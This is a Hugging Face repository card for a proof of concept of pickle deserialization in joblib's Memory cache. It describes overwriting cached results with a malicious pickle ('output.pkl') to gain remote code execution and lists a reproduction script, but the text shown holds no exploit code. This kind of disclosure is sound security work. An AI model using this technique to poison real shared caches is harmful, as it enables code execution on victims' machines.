YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

Joblib Memory Cache Poisoning PoC (RCE)

This repository contains a Proof-of-Concept (PoC) for a critical Deserialization vulnerability in the joblib library, specifically affecting the joblib.Memory caching mechanism.

Files

output.pkl: A malicious pickle file designed to trigger Arbitrary Code Execution (RCE).
reproduce.py: A Python script that demonstrates the attack flow from a victim's perspective and an attacker's perspective.

Vulnerability Overview

The vulnerability (CWE-502) allows an attacker with write access to a shared or persistent cache directory to overwrite legitimate cached results with malicious pickle payloads. joblib implicitly deserializes these files without integrity verification, leading to RCE.

Steps to Reproduce

Install requirements:
```
pip install joblib
```

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support